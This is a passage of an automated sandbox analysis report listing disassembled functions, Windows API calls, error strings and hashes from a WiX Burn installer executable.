                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %ls%ls$Failed to create the fully-qualified path to %ls.$Failed to get the Windows system directory.$Failed to load the library %ls.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                          • API String ID: 0-2188560433
                                                                                                                                                          • Opcode ID: d1fb0e47d3c72037511d7971c8c46603672b706d5a24e2e3c646380ffa47c24c
                                                                                                                                                          • Instruction ID: 55654f764c3439da8eb9bbbd3e0f2676a390b32f5fae097e90c6ddff5eba7411
                                                                                                                                                          • Opcode Fuzzy Hash: d1fb0e47d3c72037511d7971c8c46603672b706d5a24e2e3c646380ffa47c24c
                                                                                                                                                          • Instruction Fuzzy Hash: 4B21F6B2E41314B7EB219A558C0AF9F7F649F41B54F51407BFA04BA2E1E2789A00D698
                                                                                                                                                          Function 00470388 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 125COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,004706F3,00000000,00000000,80000002,00000000,00020019,?,00020019,00000000,00000000,00000000), ref: 0047040A
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\env2util.cpp, xrefs: 004703B9, 00470492, 00470497, 004704AC
                                                                                                                                                          • Failed to get max length of input buffer., xrefs: 004703AD
                                                                                                                                                          • Failed to re-allocate more space for expanded path., xrefs: 00470475
                                                                                                                                                          • Failed to get max length of written input buffer., xrefs: 00470464
                                                                                                                                                          • Failed to expand environment variables in string: %ls, xrefs: 004704A0
                                                                                                                                                          • Failed to allocate space for expanded path., xrefs: 004703E6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID: Failed to allocate space for expanded path.$Failed to expand environment variables in string: %ls$Failed to get max length of input buffer.$Failed to get max length of written input buffer.$Failed to re-allocate more space for expanded path.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\env2util.cpp
                                                                                                                                                          • API String ID: 1452528299-2127845425
                                                                                                                                                          • Opcode ID: b627a70392b70cb35ec876b61fbe19fbc857b5890f95688b41457eae506945b7
                                                                                                                                                          • Instruction ID: 62115705e0fb5d731011c591359a4a125e4e9eaa5f6310222d535d2314273a35
                                                                                                                                                          • Opcode Fuzzy Hash: b627a70392b70cb35ec876b61fbe19fbc857b5890f95688b41457eae506945b7
                                                                                                                                                          • Instruction Fuzzy Hash: 12310A72A41320FBE7325A558C06FEB7A589B11B60F118167FF08FF2C1E67C8D008699
                                                                                                                                                          Function 00465A73 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 101COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to concatenate string to pre-init buffer$Failed to get length of raw string$Failed to write output to log: %ls - %hs$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\logutil.cpp
                                                                                                                                                          • API String ID: 0-1097950227
                                                                                                                                                          • Opcode ID: 45f9002e9810b9563c67f962355f049f41ed8f9e47c4e59d44635b1045eeb24a
                                                                                                                                                          • Instruction ID: ef832becddccedab5efee911b2044f22ad6ad69be1f787cef215d9f7e9fc0e8f
                                                                                                                                                          • Opcode Fuzzy Hash: 45f9002e9810b9563c67f962355f049f41ed8f9e47c4e59d44635b1045eeb24a
                                                                                                                                                          • Instruction Fuzzy Hash: 32210972A41724B7D32196958C85FBF766C9B41B64F51022BF904BA1C0F7BCAD0097AE
                                                                                                                                                          Function 0046807B Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 142stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • lstrlenW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000003,00000000,00000000,?,?,?,00467DA4), ref: 004681D4
                                                                                                                                                            • Part of subcall function 0040758B: GetProcessHeap.KERNEL32(00000000,?,?,?,004390BB,?), ref: 00407595
                                                                                                                                                            • Part of subcall function 0040758B: HeapFree.KERNEL32(00000000,?,?,004390BB,?), ref: 0040759C
                                                                                                                                                            • Part of subcall function 0040758B: GetLastError.KERNEL32(?,?,004390BB,?), ref: 004075A6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$ErrorFreeLastProcesslstrlen
                                                                                                                                                          • String ID: Failed to allocate buffer for raw registry value.$Failed to expand registry value: %ls$Failed to get size of raw registry value.$Failed to read raw registry value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 1805815496-1440198124
                                                                                                                                                          • Opcode ID: 4403eeaaba7e41c739a812c5222019c3a2d1c0e4dbe5125654a77bc83d572658
                                                                                                                                                          • Instruction ID: c9e73f3323c4cc355ea54f5c7b8d7bf44b3e85b444beaa50acf15e99921f50d7
                                                                                                                                                          • Opcode Fuzzy Hash: 4403eeaaba7e41c739a812c5222019c3a2d1c0e4dbe5125654a77bc83d572658
                                                                                                                                                          • Instruction Fuzzy Hash: 9241B471A40215BBDF315A58CC4AF9B3BA89B46754F11426BF900BB281FB7C9C41C69F
                                                                                                                                                          Function 004709FC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 67COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • SOFTWARE\Policies\, xrefs: 00470A0C
                                                                                                                                                          • Failed to combine logging path with root path., xrefs: 00470A1C
                                                                                                                                                          • Failed to open policy registry key., xrefs: 00470A74
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 00470A2B, 00470A83
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to combine logging path with root path.$Failed to open policy registry key.$SOFTWARE\Policies\$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                          • API String ID: 0-956796463
                                                                                                                                                          • Opcode ID: 2ad399762d59b0f37e3ddd7831f243ab631feaa041728f45ecc016160363ebd0
                                                                                                                                                          • Instruction ID: ccc1ee54d7eb4979477f2923c99f34392b170028f54e7a35188d7be746844c96
                                                                                                                                                          • Opcode Fuzzy Hash: 2ad399762d59b0f37e3ddd7831f243ab631feaa041728f45ecc016160363ebd0
                                                                                                                                                          • Instruction Fuzzy Hash: 6311B632E41325FAEB315654CC0BF9B76649F22B58F118127B908BA1D1E37C4E5096DD
                                                                                                                                                          Function 00470C62 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000006,00000006,00000070,00000000,00000000,00000000,00000000,00000000,?,?,0041B99C,WiX\Burn,EngineWorkingDirectory,00000000), ref: 00470D12
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to open policy key: %ls, name: %ls, xrefs: 00470CE4
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 00470C93, 00470CF3
                                                                                                                                                          • Failed to open policy key: %ls, xrefs: 00470C87
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                          • API String ID: 3535843008-840529963
                                                                                                                                                          • Opcode ID: a824bfb3fbe14518114ecff37b7bdf8106921f259711ad188a9a15fef0f73db0
                                                                                                                                                          • Instruction ID: 111e18d2509f6aa2e30a40ce09d937a8cfb2c2bb58787ab531ddeff0c1f09924
                                                                                                                                                          • Opcode Fuzzy Hash: a824bfb3fbe14518114ecff37b7bdf8106921f259711ad188a9a15fef0f73db0
                                                                                                                                                          • Instruction Fuzzy Hash: 0A21F272902325FBEB325EC0CC0ABEBBA24DB15725F108127FA0835191E3BC5E50E6D9
                                                                                                                                                          Function 00470B7D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,0000001C,?,?,0041E59F,WiX\Burn,PackageCache,00000000,0000001C), ref: 00470C27
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to open policy key: %ls, name: %ls, xrefs: 00470BFC
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 00470BAE, 00470C08
                                                                                                                                                          • Failed to open policy key: %ls, xrefs: 00470BA2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                          • API String ID: 3535843008-840529963
                                                                                                                                                          • Opcode ID: 3faf49307198e5b2345a2e983b04f6092a9f36eda966e4fee69e1d8b179a6d5a
                                                                                                                                                          • Instruction ID: 83ef131e28ac02836822d3ce4730085d6a65ceb216b57ba76ad27a46ff006ffb
                                                                                                                                                          • Opcode Fuzzy Hash: 3faf49307198e5b2345a2e983b04f6092a9f36eda966e4fee69e1d8b179a6d5a
                                                                                                                                                          • Instruction Fuzzy Hash: 0B212672941229FFDB225ED0CC06BEF7A24DB11718F208167FA0876191D3BD4E90D6D9
                                                                                                                                                          Function 00439280 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00439DD1: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,004392AF,?,?,?), ref: 00439DF9
                                                                                                                                                            • Part of subcall function 00439DD1: GetLastError.KERNEL32(?,004392AF,?,?,?), ref: 00439E03
                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 004392BD
                                                                                                                                                          • GetLastError.KERNEL32 ref: 004392C7
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLast$PointerRead
                                                                                                                                                          • String ID: Failed to read during cabinet extraction.$d:\a\wix\wix\src\burn\engine\cabextract.cpp
                                                                                                                                                          • API String ID: 2170121939-580274504
                                                                                                                                                          • Opcode ID: b4b2ece2940f106c6b7b7e43a552fee34c791d953062bb1e35ba725d5b29f924
                                                                                                                                                          • Instruction ID: 22816117e5bced05a6e33980bf0434229973ba791be389ce19f9919a005104a7
                                                                                                                                                          • Opcode Fuzzy Hash: b4b2ece2940f106c6b7b7e43a552fee34c791d953062bb1e35ba725d5b29f924
                                                                                                                                                          • Instruction Fuzzy Hash: 9511CA72A40625BBCB209F95DD45E8B7F68FF08764F010165FD08B7291D274DD1087D8
                                                                                                                                                          Function 00439DD1 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,004392AF,?,?,?), ref: 00439DF9
                                                                                                                                                          • GetLastError.KERNEL32(?,004392AF,?,?,?), ref: 00439E03
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                          • String ID: Failed to move to virtual file pointer.$d:\a\wix\wix\src\burn\engine\cabextract.cpp
                                                                                                                                                          • API String ID: 2976181284-3968184250
                                                                                                                                                          • Opcode ID: 74ce7424520c520ce45b1d6f15fc70c10b41a9ada884937b421213f46a2911ef
                                                                                                                                                          • Instruction ID: 650ea876d165582ecec831b66fe2a23ea68910ea9a61a8aae95c4541e1f10227
                                                                                                                                                          • Opcode Fuzzy Hash: 74ce7424520c520ce45b1d6f15fc70c10b41a9ada884937b421213f46a2911ef
                                                                                                                                                          • Instruction Fuzzy Hash: 1D01F53290022577D7215A5A8C09E5BBE18EF45BB4F11813BFD1CA6291D769DC2097D8
                                                                                                                                                          Function 004018A4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00401453: GetModuleHandleW.KERNEL32(kernel32,00000000,004018AF,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 00401466
                                                                                                                                                            • Part of subcall function 00401453: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 00401472
                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018C0
                                                                                                                                                          • GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018D1
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apputil.cpp, xrefs: 004018F3, 004018F8, 0040190D
                                                                                                                                                          • Failed to load library with LOAD_LIBRARY_SEARCH_SYSTEM32: %ls., xrefs: 00401901
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$HandleLibraryLoadModule
                                                                                                                                                          • String ID: Failed to load library with LOAD_LIBRARY_SEARCH_SYSTEM32: %ls.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                          • API String ID: 4252302101-2048249808
                                                                                                                                                          • Opcode ID: 362ba4bc44472fbb3cff0f1d0979729c261a55f77d939210c8d0b29170138464
                                                                                                                                                          • Instruction ID: a0962a609da333b22fcb3a8d3a800a0755a1864bc8b25d0220e779f0ad846446
                                                                                                                                                          • Opcode Fuzzy Hash: 362ba4bc44472fbb3cff0f1d0979729c261a55f77d939210c8d0b29170138464
                                                                                                                                                          • Instruction Fuzzy Hash: 9C018477A4122477DB212A558C15F9F7E54AB42BA1F41807AFE08BA2F1D6384D00D7D8
                                                                                                                                                          Function 00467B72 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(?,00467B6E,00000000,00000000,00000003,00000000,?,?,00470A51,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 00467B9D
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 00467BCC, 00467BD2, 00467BE9
                                                                                                                                                          • Failed to open registry key, root: %x, subkey: %ls., xrefs: 00467BDE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Open
                                                                                                                                                          • String ID: Failed to open registry key, root: %x, subkey: %ls.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 71445658-1873020677
                                                                                                                                                          • Opcode ID: 89a3ab6d174875368107eb3f19057f5f23784cc12ec836a302179b73ec5c8565
                                                                                                                                                          • Instruction ID: 77467f32aca5e4bb3de793605dd258dc594eb0d6e5bfc4e31786fc691a298e3b
                                                                                                                                                          • Opcode Fuzzy Hash: 89a3ab6d174875368107eb3f19057f5f23784cc12ec836a302179b73ec5c8565
                                                                                                                                                          • Instruction Fuzzy Hash: 9F01267610811977E7211E168C05E9B3A5ADFC8BA8F15402BFD04AB350FA3E9C51D6FE
                                                                                                                                                          Function 004010B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040111A
                                                                                                                                                            • Part of subcall function 0040252B: GetFileAttributesW.KERNELBASE(?,00000000,?,004010DF,?,00000000), ref: 00402534
                                                                                                                                                            • Part of subcall function 004050E3: FindFirstFileW.KERNELBASE(?,?,?,00000000), ref: 0040511E
                                                                                                                                                            • Part of subcall function 004050E3: FindClose.KERNEL32(00000000,?,00000000), ref: 0040512A
                                                                                                                                                            • Part of subcall function 004018A4: LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018C0
                                                                                                                                                            • Part of subcall function 004018A4: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018D1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileFind$AttributesCloseErrorExitFirstLastLibraryLoadProcess
                                                                                                                                                          • String ID: %ls.local$Comctl32.dll
                                                                                                                                                          • API String ID: 3652749591-3877841543
                                                                                                                                                          • Opcode ID: abf633eda87f5c5333276b9237a49600086451751ce93b08044b869ba94c2540
